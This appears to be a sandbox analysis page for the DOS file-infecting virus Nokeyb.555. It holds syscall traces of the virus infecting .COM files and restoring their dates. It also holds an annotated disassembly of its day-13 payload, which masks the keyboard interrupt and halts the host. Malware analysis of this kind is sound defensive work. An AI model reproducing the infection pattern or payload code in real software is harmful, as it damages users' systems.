Sample viewer

vx.netlux.org/Virus.DOS.Nokeyb.555


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:06:24.575327405Z 71 PC: 12a7a | Get current directory
2018-12-17T22:06:24.578713416Z 59 PC: 12a82 | Change current directory
2018-12-17T22:06:24.582554254Z 26 PC: 12aca | Set disk transfer address
2018-12-17T22:06:24.583559874Z 78 PC: 12b27 | Find first file
2018-12-17T22:06:24.596198123Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T22:06:24.61411543Z 61 PC: 12b5a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:06:24.625615466Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:24.632247494Z 66 PC: 12b81 | Move file pointer
2018-12-17T22:06:24.634377917Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.636947445Z 66 PC: 12b97 | Move file pointer
2018-12-17T22:06:24.638317001Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:06:24.641335414Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.644384593Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-17T22:06:24.652738146Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:06:24.656179277Z 87 PC: 12c1b | Get or set file date and time
2018-12-17T22:06:24.657827031Z 67 PC: 12c28 | Get or set file attributes
2018-12-17T22:06:24.662590795Z 62 PC: 12c2c | Close file
2018-12-17T22:06:24.67113294Z 79 PC: 12b31 | Find next file
2018-12-17T22:06:24.674298431Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T22:06:24.684033103Z 61 PC: 12b5a | Open file (Filename = 'PRINT.COM')
2018-12-17T22:06:24.692106239Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:24.698608683Z 66 PC: 12b81 | Move file pointer
2018-12-17T22:06:24.700110147Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.703849259Z 66 PC: 12b97 | Move file pointer
2018-12-17T22:06:24.70541288Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:06:24.707959237Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.712689022Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-17T22:06:24.720414753Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:06:24.722948774Z 87 PC: 12c1b | Get or set file date and time
2018-12-17T22:06:24.724348251Z 67 PC: 12c28 | Get or set file attributes
2018-12-17T22:06:24.729167895Z 62 PC: 12c2c | Close file
2018-12-17T22:06:24.736703225Z 79 PC: 12b31 | Find next file
2018-12-17T22:06:24.739206395Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T22:06:24.750359048Z 61 PC: 12b5a | Open file (Filename = 'HELLO.COM')
2018-12-17T22:06:24.758282362Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:06:24.765357424Z 66 PC: 12b81 | Move file pointer
2018-12-17T22:06:24.774691458Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.777559953Z 66 PC: 12b97 | Move file pointer
2018-12-17T22:06:24.779364559Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:06:24.786411276Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:06:24.789651696Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-17T22:06:24.797911996Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-17T22:06:24.801954766Z 87 PC: 12c1b | Get or set file date and time
2018-12-17T22:06:24.803441091Z 67 PC: 12c28 | Get or set file attributes
2018-12-17T22:06:24.808201178Z 62 PC: 12c2c | Close file
2018-12-17T22:06:24.816452628Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
; Continuation of the date check that begins with `cmp dl, 0xd` on the trace row
; above (DOS Get date returns the day of month in DL).
;   day == 13 : print a message, mask the keyboard IRQ at the PIC, terminate.
;   otherwise : restore the DOS state changed earlier and prepare to enter the
;               host program at offset 0x100.
; Triage note: in this run the rows that follow (Set disk transfer address at 12aac,
; Change current directory at 12ab4) show the cleanup path; a sandbox run on any
; day other than the 13th shows only the file-modification rows, not the payload.
0x12a90: jne 0x12aa5    ; day != 13 -> skip the payload, go to the cleanup path
0x12a92: mov ah, 9    ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12a94: lea dx, word ptr [bp + 0x303]    ; message address, bp-relative (bp presumably holds the code's runtime base - confirm)
0x12a98: int 0x21
0x12a9a: in al, 0x21    ; port 0x21 = master 8259 PIC interrupt mask register (an I/O port, unrelated to int 0x21)
0x12a9c: or al, 2    ; set bit 1 = mask IRQ1, the keyboard interrupt
0x12a9e: out 0x21, al    ; keyboard input is no longer serviced; this changes PIC state only, nothing on disk
0x12aa0: mov ax, 0x4c00    ; DOS function 4Ch, return code 0
0x12aa3: int 0x21    ; terminate: the host program does not run on this path
0x12aa5: mov ah, 0x1a    ; cleanup path: DOS function 1Ah, set disk transfer address
0x12aa7: mov dx, 0x80    ; DS:0x80 is the default DTA inside the PSP
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b    ; DOS function 3Bh, change current directory
0x12aae: lea dx, word ptr [bp + 0x35a]    ; presumably the path saved by the earlier Get current directory call - confirm
0x12ab2: int 0x21
0x12ab4: mov di, 0x100    ; 0x100 = entry offset of a .COM image
0x12ab7: lea si, word ptr [bp + 0xfc]    ; bp-relative buffer holding 4 saved bytes
0x12abb: movsd dword ptr es:[di], dword ptr [si]    ; copy 4 bytes to es:0x100; presumably the host's original first bytes (cf. the 4-byte read/write rows) - confirm
0x12abd: push 0x100    ; listing stops here; presumably a ret follows to transfer control to the host - not shown
2018-12-17T22:06:24.81845767Z 26 PC: 12aac | Set disk transfer address
2018-12-17T22:06:24.819464632Z 59 PC: 12ab4 | Change current directory
2018-12-17T22:06:24.821748517Z 71 PC: 12a7a | Get current directory
2018-12-17T22:06:24.824472031Z 59 PC: 12a82 | Change current directory
2018-12-17T22:06:24.828635883Z 26 PC: 12aca | Set disk transfer address
2018-12-17T22:06:24.830079714Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
; Continuation of the date check that begins with `cmp dl, 0xd` on the trace row
; above (DOS Get date returns the day of month in DL).
;   day == 13 : print a message, mask the keyboard IRQ at the PIC, terminate.
;   otherwise : restore the DOS state changed earlier and prepare to enter the
;               host program at offset 0x100.
; The rows that follow this listing (12aac, 12ab4) show the cleanup path was taken.
0x12a90: jne 0x12aa5    ; day != 13 -> skip the payload, go to the cleanup path
0x12a92: mov ah, 9    ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12a94: lea dx, word ptr [bp + 0x303]    ; message address, bp-relative (bp presumably holds the code's runtime base - confirm)
0x12a98: int 0x21
0x12a9a: in al, 0x21    ; port 0x21 = master 8259 PIC interrupt mask register (an I/O port, unrelated to int 0x21)
0x12a9c: or al, 2    ; set bit 1 = mask IRQ1, the keyboard interrupt
0x12a9e: out 0x21, al    ; keyboard input is no longer serviced; this changes PIC state only, nothing on disk
0x12aa0: mov ax, 0x4c00    ; DOS function 4Ch, return code 0
0x12aa3: int 0x21    ; terminate: the host program does not run on this path
0x12aa5: mov ah, 0x1a    ; cleanup path: DOS function 1Ah, set disk transfer address
0x12aa7: mov dx, 0x80    ; DS:0x80 is the default DTA inside the PSP
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b    ; DOS function 3Bh, change current directory
0x12aae: lea dx, word ptr [bp + 0x35a]    ; presumably the path saved by the earlier Get current directory call - confirm
0x12ab2: int 0x21
0x12ab4: mov di, 0x100    ; 0x100 = entry offset of a .COM image
0x12ab7: lea si, word ptr [bp + 0xfc]    ; bp-relative buffer holding 4 saved bytes
0x12abb: movsd dword ptr es:[di], dword ptr [si]    ; copy 4 bytes to es:0x100; presumably the host's original first bytes - confirm
0x12abd: push 0x100    ; listing stops here; presumably a ret follows to transfer control to the host - not shown
2018-12-17T22:06:24.83208609Z 26 PC: 12aac | Set disk transfer address
2018-12-17T22:06:24.833005281Z 59 PC: 12ab4 | Change current directory
2018-12-17T22:06:24.8353304Z 71 PC: 12a7a | Get current directory
2018-12-17T22:06:24.843473608Z 59 PC: 12a82 | Change current directory
2018-12-17T22:06:24.847832296Z 26 PC: 12aca | Set disk transfer address
2018-12-17T22:06:24.851583556Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
; Continuation of the date check that begins with `cmp dl, 0xd` on the trace row
; above (DOS Get date returns the day of month in DL).
;   day == 13 : print a message, mask the keyboard IRQ at the PIC, terminate.
;   otherwise : restore the DOS state changed earlier and prepare to enter the
;               host program at offset 0x100.
; The rows that follow this listing (12aac, 12ab4) show the cleanup path was taken.
0x12a90: jne 0x12aa5    ; day != 13 -> skip the payload, go to the cleanup path
0x12a92: mov ah, 9    ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12a94: lea dx, word ptr [bp + 0x303]    ; message address, bp-relative (bp presumably holds the code's runtime base - confirm)
0x12a98: int 0x21
0x12a9a: in al, 0x21    ; port 0x21 = master 8259 PIC interrupt mask register (an I/O port, unrelated to int 0x21)
0x12a9c: or al, 2    ; set bit 1 = mask IRQ1, the keyboard interrupt
0x12a9e: out 0x21, al    ; keyboard input is no longer serviced; this changes PIC state only, nothing on disk
0x12aa0: mov ax, 0x4c00    ; DOS function 4Ch, return code 0
0x12aa3: int 0x21    ; terminate: the host program does not run on this path
0x12aa5: mov ah, 0x1a    ; cleanup path: DOS function 1Ah, set disk transfer address
0x12aa7: mov dx, 0x80    ; DS:0x80 is the default DTA inside the PSP
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b    ; DOS function 3Bh, change current directory
0x12aae: lea dx, word ptr [bp + 0x35a]    ; presumably the path saved by the earlier Get current directory call - confirm
0x12ab2: int 0x21
0x12ab4: mov di, 0x100    ; 0x100 = entry offset of a .COM image
0x12ab7: lea si, word ptr [bp + 0xfc]    ; bp-relative buffer holding 4 saved bytes
0x12abb: movsd dword ptr es:[di], dword ptr [si]    ; copy 4 bytes to es:0x100; presumably the host's original first bytes - confirm
0x12abd: push 0x100    ; listing stops here; presumably a ret follows to transfer control to the host - not shown
2018-12-17T22:06:24.85396643Z 26 PC: 12aac | Set disk transfer address
2018-12-17T22:06:24.855006158Z 59 PC: 12ab4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1838,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:28.469347397Z 71 PC: 12a7a | Get current directory
2018-12-25T11:44:28.473014826Z 59 PC: 12a82 | Change current directory
2018-12-25T11:44:28.477368978Z 26 PC: 12aca | Set disk transfer address
2018-12-25T11:44:28.478569358Z 78 PC: 12b27 | Find first file
2018-12-25T11:44:28.491059931Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:44:28.757049795Z 61 PC: 12b5a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:28.764972318Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:28.77323516Z 66 PC: 12b81 | Move file pointer
2018-12-25T11:44:28.775778906Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:28.779323704Z 66 PC: 12b97 | Move file pointer
2018-12-25T11:44:28.78123272Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:44:28.796434096Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:28.80013302Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-25T11:44:28.808978613Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-25T11:44:28.812670512Z 87 PC: 12c1b | Get or set file date and time
2018-12-25T11:44:28.814831123Z 67 PC: 12c28 | Get or set file attributes
2018-12-25T11:44:28.821724972Z 62 PC: 12c2c | Close file
2018-12-25T11:44:29.132165617Z 79 PC: 12b31 | Find next file
2018-12-25T11:44:29.13523008Z 67 PC: 12b53 | Get or set file attributes (See above)
2018-12-25T11:44:29.146876407Z 61 PC: 12b5a | Open file (See above)
2018-12-25T11:44:29.155741385Z 63 PC: 12b68 | Read file or device (See above)
2018-12-25T11:44:29.162997107Z 66 PC: 12b81 | Move file pointer (See above)
2018-12-25T11:44:29.164692791Z 64 PC: 12b8c | Write file or device (See above)
2018-12-25T11:44:29.168989672Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T11:44:29.171154204Z 63 PC: 12ba2 | Read file or device (See above)
2018-12-25T11:44:29.174386812Z 64 PC: 12bb3 | Write file or device (See above)
2018-12-25T11:44:29.178559074Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T11:44:29.188833194Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:44:29.191916787Z 87 PC: 12c1b | Get or set file date and time (See above)
2018-12-25T11:44:29.194514888Z 67 PC: 12c28 | Get or set file attributes (See above)
2018-12-25T11:44:29.201092414Z 62 PC: 12c2c | Close file (See above)
2018-12-25T11:44:29.213094034Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T11:44:29.216160046Z 67 PC: 12b53 | Get or set file attributes (See above)
2018-12-25T11:44:29.228873392Z 61 PC: 12b5a | Open file (See above)
2018-12-25T11:44:29.236566787Z 63 PC: 12b68 | Read file or device (See above)
2018-12-25T11:44:29.244021645Z 66 PC: 12b81 | Move file pointer (See above)
2018-12-25T11:44:29.246571192Z 64 PC: 12b8c | Write file or device (See above)
2018-12-25T11:44:29.249684832Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T11:44:29.251395504Z 63 PC: 12ba2 | Read file or device (See above)
2018-12-25T11:44:29.255192128Z 64 PC: 12bb3 | Write file or device (See above)
2018-12-25T11:44:29.260983717Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T11:44:29.2703909Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:44:29.273386326Z 87 PC: 12c1b | Get or set file date and time (See above)
2018-12-25T11:44:29.275994045Z 67 PC: 12c28 | Get or set file attributes (See above)
2018-12-25T11:44:29.281154529Z 62 PC: 12c2c | Close file (See above)
2018-12-25T11:44:29.289871445Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
; Continuation of the date check that begins with `cmp dl, 0xd` on the trace row
; above (DOS Get date returns the day of month in DL).
;   day == 13 : print a message, mask the keyboard IRQ at the PIC, terminate.
;   otherwise : restore the DOS state changed earlier and prepare to enter the
;               host program at offset 0x100.
; The rows that follow this listing (12aac, 12ab4) show the cleanup path was taken
; in this run, i.e. the emulated day was not the 13th.
0x12a90: jne 0x12aa5    ; day != 13 -> skip the payload, go to the cleanup path
0x12a92: mov ah, 9    ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12a94: lea dx, word ptr [bp + 0x303]    ; message address, bp-relative (bp presumably holds the code's runtime base - confirm)
0x12a98: int 0x21
0x12a9a: in al, 0x21    ; port 0x21 = master 8259 PIC interrupt mask register (an I/O port, unrelated to int 0x21)
0x12a9c: or al, 2    ; set bit 1 = mask IRQ1, the keyboard interrupt
0x12a9e: out 0x21, al    ; keyboard input is no longer serviced; this changes PIC state only, nothing on disk
0x12aa0: mov ax, 0x4c00    ; DOS function 4Ch, return code 0
0x12aa3: int 0x21    ; terminate: the host program does not run on this path
0x12aa5: mov ah, 0x1a    ; cleanup path: DOS function 1Ah, set disk transfer address
0x12aa7: mov dx, 0x80    ; DS:0x80 is the default DTA inside the PSP
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b    ; DOS function 3Bh, change current directory
0x12aae: lea dx, word ptr [bp + 0x35a]    ; presumably the path saved by the earlier Get current directory call - confirm
0x12ab2: int 0x21
0x12ab4: mov di, 0x100    ; 0x100 = entry offset of a .COM image
0x12ab7: lea si, word ptr [bp + 0xfc]    ; bp-relative buffer holding 4 saved bytes
0x12abb: movsd dword ptr es:[di], dword ptr [si]    ; copy 4 bytes to es:0x100; presumably the host's original first bytes - confirm
0x12abd: push 0x100    ; listing stops here; presumably a ret follows to transfer control to the host - not shown
2018-12-25T11:44:29.293673212Z 26 PC: 12aac | Set disk transfer address
2018-12-25T11:44:29.294909914Z 59 PC: 12ab4 | Change current directory
2018-12-25T11:44:29.297262667Z 71 PC: 12a7a | Get current directory (See above)
2018-12-25T11:44:29.301126186Z 59 PC: 12a82 | Change current directory (See above)
2018-12-25T11:44:29.305889983Z 26 PC: 12aca | Set disk transfer address (See above)
2018-12-25T11:44:29.307384396Z 26 PC: 12aac | Set disk transfer address (See above)
2018-12-25T11:44:29.309854123Z 59 PC: 12ab4 | Change current directory (See above)

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1838,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:28.497751514Z 71 PC: 12a7a | Get current directory
2018-12-25T11:44:28.502437287Z 59 PC: 12a82 | Change current directory
2018-12-25T11:44:28.506831332Z 26 PC: 12aca | Set disk transfer address
2018-12-25T11:44:28.507902144Z 78 PC: 12b27 | Find first file
2018-12-25T11:44:28.514758118Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:44:28.756612207Z 61 PC: 12b5a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:28.763984548Z 63 PC: 12b68 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:28.771330805Z 66 PC: 12b81 | Move file pointer
2018-12-25T11:44:28.773217549Z 64 PC: 12b8c | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:28.776657719Z 66 PC: 12b97 | Move file pointer
2018-12-25T11:44:28.778561668Z 63 PC: 12ba2 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:44:28.78215121Z 64 PC: 12bb3 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:28.785600276Z 64 PC: 12c06 | Write file or device (Write 544 bytes on handle 5)
2018-12-25T11:44:28.79483186Z 64 PC: 12c10 | Write file or device (Write 7 bytes on handle 5)
2018-12-25T11:44:28.799169927Z 87 PC: 12c1b | Get or set file date and time
2018-12-25T11:44:28.80145339Z 67 PC: 12c28 | Get or set file attributes
2018-12-25T11:44:28.806949701Z 62 PC: 12c2c | Close file
2018-12-25T11:44:28.977019296Z 79 PC: 12b31 | Find next file
2018-12-25T11:44:28.980598359Z 67 PC: 12b53 | Get or set file attributes (See above)
2018-12-25T11:44:29.132247709Z 61 PC: 12b5a | Open file (See above)
2018-12-25T11:44:29.140571638Z 63 PC: 12b68 | Read file or device (See above)
2018-12-25T11:44:29.149254187Z 66 PC: 12b81 | Move file pointer (See above)
2018-12-25T11:44:29.151076128Z 64 PC: 12b8c | Write file or device (See above)
2018-12-25T11:44:29.154382421Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T11:44:29.156828234Z 63 PC: 12ba2 | Read file or device (See above)
2018-12-25T11:44:29.159491835Z 64 PC: 12bb3 | Write file or device (See above)
2018-12-25T11:44:29.163648197Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T11:44:29.173678511Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:44:29.176960657Z 87 PC: 12c1b | Get or set file date and time (See above)
2018-12-25T11:44:29.179143848Z 67 PC: 12c28 | Get or set file attributes (See above)
2018-12-25T11:44:29.185530904Z 62 PC: 12c2c | Close file (See above)
2018-12-25T11:44:29.195233078Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T11:44:29.198294073Z 67 PC: 12b53 | Get or set file attributes (See above)
2018-12-25T11:44:29.21205617Z 61 PC: 12b5a | Open file (See above)
2018-12-25T11:44:29.219740646Z 63 PC: 12b68 | Read file or device (See above)
2018-12-25T11:44:29.227496313Z 66 PC: 12b81 | Move file pointer (See above)
2018-12-25T11:44:29.229867247Z 64 PC: 12b8c | Write file or device (See above)
2018-12-25T11:44:29.233119543Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T11:44:29.234989392Z 63 PC: 12ba2 | Read file or device (See above)
2018-12-25T11:44:29.238010063Z 64 PC: 12bb3 | Write file or device (See above)
2018-12-25T11:44:29.242082583Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T11:44:29.250965017Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:44:29.254489352Z 87 PC: 12c1b | Get or set file date and time (See above)
2018-12-25T11:44:29.257205862Z 67 PC: 12c28 | Get or set file attributes (See above)
2018-12-25T11:44:29.262488911Z 62 PC: 12c2c | Close file (See above)
2018-12-25T11:44:29.271042797Z 42 PC: 12a8d | Get date 0x12a8d: cmp dl, 0xd
; Continuation of the date check that begins with `cmp dl, 0xd` on the trace row
; above (DOS Get date returns the day of month in DL).
;   day == 13 : print a message, mask the keyboard IRQ at the PIC, terminate.
;   otherwise : restore the DOS state changed earlier and prepare to enter the
;               host program at offset 0x100.
; In this run the two rows after the listing (Display string at 12a9a, Terminate
; at 12aa5) show the day-13 path executing; the job settings printed before this
; run give "Day":13, which appears to be the emulated clock - confirm.
; The port I/O between those two DOS calls produces no DOS call of its own, so it
; is visible only in the disassembly, not in the syscall rows.
0x12a90: jne 0x12aa5    ; day != 13 -> skip the payload, go to the cleanup path
0x12a92: mov ah, 9    ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12a94: lea dx, word ptr [bp + 0x303]    ; message address, bp-relative (bp presumably holds the code's runtime base - confirm)
0x12a98: int 0x21
0x12a9a: in al, 0x21    ; port 0x21 = master 8259 PIC interrupt mask register (an I/O port, unrelated to int 0x21)
0x12a9c: or al, 2    ; set bit 1 = mask IRQ1, the keyboard interrupt
0x12a9e: out 0x21, al    ; keyboard input is no longer serviced; this changes PIC state only, nothing on disk
0x12aa0: mov ax, 0x4c00    ; DOS function 4Ch, return code 0
0x12aa3: int 0x21    ; terminate: the host program does not run on this path
0x12aa5: mov ah, 0x1a    ; cleanup path: DOS function 1Ah, set disk transfer address
0x12aa7: mov dx, 0x80    ; DS:0x80 is the default DTA inside the PSP
0x12aaa: int 0x21
0x12aac: mov ah, 0x3b    ; DOS function 3Bh, change current directory
0x12aae: lea dx, word ptr [bp + 0x35a]    ; presumably the path saved by the earlier Get current directory call - confirm
0x12ab2: int 0x21
0x12ab4: mov di, 0x100    ; 0x100 = entry offset of a .COM image
0x12ab7: lea si, word ptr [bp + 0xfc]    ; bp-relative buffer holding 4 saved bytes
0x12abb: movsd dword ptr es:[di], dword ptr [si]    ; copy 4 bytes to es:0x100; presumably the host's original first bytes - confirm
0x12abd: push 0x100    ; listing stops here; presumably a ret follows to transfer control to the host - not shown
2018-12-25T11:44:29.274902809Z 9 PC: 12a9a | Display string (String= 'No keyboard found! ')
2018-12-25T11:44:29.279216241Z 76 PC: 12aa5 | Terminate with return code (Return code = '0')